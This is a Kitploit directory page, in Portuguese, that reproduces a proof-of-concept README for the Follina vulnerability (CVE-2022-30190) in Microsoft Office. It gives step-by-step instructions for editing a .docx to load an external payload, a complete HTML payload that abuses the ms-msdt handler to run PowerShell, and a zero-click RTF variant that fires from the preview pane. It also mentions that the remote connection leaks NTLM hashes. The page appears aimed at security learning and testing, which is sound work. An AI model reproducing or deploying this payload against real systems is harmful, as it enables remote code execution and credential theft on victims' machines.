Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
PoC-CVE-2022-30190 — Exploit de prova de conceito para CVE-2022-30190 (Follina), demonstrando execução remota de código por meio de documentos Microsoft Office especialmente elaborados usando o manipulador de URI ms-msdt. | Kitploit
Ferramentas/GitHubGitHub/wysiiwyg/poc-cve-2022-30190
Análise de VulnerabilidadesExploraçãoAprendizado e EducaçãoDesenvolvimento de Payloads
GitHubwysiiwyg/poc-cve-2022-30190

PoC-CVE-2022-30190

Exploit de prova de conceito para CVE-2022-30190 (Follina), demonstrando execução remota de código por meio de documentos Microsoft Office especialmente elaborados usando o manipulador de URI ms-msdt.

Ver Repositório
1222há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

POC CVE-2022-30190 : CVE 0-day MS Offic RCE também conhecido como msdt follina

Info : Novo zero-day do Microsoft Office usado em ataques para executar PowerShell

Resumo

Em 29 de maio de 2022, a equipe Nao_Sec, um time independente de Pesquisa em Segurança Cibernética, descobriu um documento malicioso do Office compartilhado no Virustotal. Este documento está usando um esquema incomum, porém conhecido, para infectar suas vítimas. O esquema não foi detectado como malicioso por alguns EDRs, como o Microsoft Defender for Endpoint. Essa vulnerabilidade poderia levar à execução de código sem necessidade de interação do usuário, pois não envolve macros, exceto se o modo de Exibição Protegida estiver habilitado. Ainda não há um número CVE atribuído.

Detalhes Técnicos

A vulnerabilidade está sendo explorada usando o esquema de URI MSProtocol para carregar código. Atacantes podem incorporar links maliciosos em documentos, modelos ou e-mails do Microsoft Office, começando com ms-msdt:, que serão carregados e executados em seguida sem interação do usuário

  • exceto se o modo de Exibição Protegida estiver habilitado. No entanto, converter o documento para o formato RTF também pode contornar o recurso de Exibição Protegida.

Prova de Conceito

Arquivos .docx do MS Office podem conter referências externas a Objetos OLE como arquivos HTML. Existe um esquema HTML "ms-msdt:" que invoca a ferramenta de diagnóstico msdt, que é capaz de executar código arbitrário (especificado nos parâmetros).

O resultado é um vetor de ataque assustador para obter RCE ao abrir arquivos .docx maliciosos (sem usar macros).

Aqui estão os passos para criar um docx de Prova de Conceito:

  1. Abra o Word (usei o 2019 Pro atualizado, 16.0.10386.20017), crie um documento fictício, insira um objeto (OLE) (como Imagem Bitmap) e salve-o em docx.

  2. Edite word/_rels/document.xml.rels na estrutura do docx (é um zip simples). Modifique a tag XML <Relationship> com o atributo

root@kitploit:~
Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"

e Target="embeddings/oleObject1.bin" alterando o valor de Target e adicionando o atributo TargetMode:

root@kitploit:~
Target = "http://<payload_server>/payload.html!"
TargetMode = "External"

Anote o valor do Id (provavelmente "rId5").

  1. Edite word/document.xml. Procure a tag "<o:OLEObject ..>" (com r:id="rId5") e altere o atributo de Type="Embed" para Type="Link" e adicione o atributo UpdateMode="OnCall".

NOTA: O docx malicioso criado é quase o mesmo do CVE-2021-44444.

  1. Sirva o payload HTML do PoC (iniciador do calc.exe) com o esquema ms-msdt em http://<payload_server>/payload.html:
root@kitploit:~
<!doctype html>
<html lang="en">
<body>
<script>
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA should be repeated >60 times
  window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX('calc.exe'))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe \"";
</script>

</body>
</html>

Observe que:

  • a linha de comentário com AAA deve ser repetida >60 vezes (mínimo de 4096 bytes).
  • No mínimo, duas travessias de diretório /../ eram necessárias no início do parâmetro IT_BrowseForFile
  • Código envolvido em $() seria executado via PowerShell, mas espaços o quebrariam
  • “.exe” deve ser a última string presente no final do parâmetro IT_BrowseForFile

Além disso, o payload de acionamento pode alcançar locais remotos. Embora seja improvável que invoque um binário não confiável, a conexão ainda carregará hashes NTLM (o que significa que os agentes mal-intencionados agora têm um hash da senha do Windows da vítima) que podem ser usados por um adversário para pós-exploração adicional.

BÔNUS (versão RTF 0-click)

Se você também adicionar estes elementos sob o elemento <o:OLEObject> em word/document.xml no passo 3:

root@kitploit:~
<o:LinkType>EnhancedMetaFile</o:LinkType>
<o:LockedField>false</o:LockedField>
<o:FieldCodes>\f 0</o:FieldCodes>

então também funcionará como RTF (abra o docx resultante e salve-o como RTF).

Com RTF, não há necessidade de abrir o arquivo no Word; basta navegar até o arquivo e visualizá-lo em um painel de visualização. O painel de visualização aciona o payload HTML externo e o RCE acontece sem nenhum clique.

Fontes :

  • https://nao-sec.org/about
  • https://www.virustotal.com/gui/file/4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784/detection
  • https://gist.github.com/tothi/66290a42896a97920055e50128c9f040 (código original)
  • https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/
  • https://github.com/sinjap/PoC-CVE-2022-30190 (informações adicionais)
Baixar ferramenta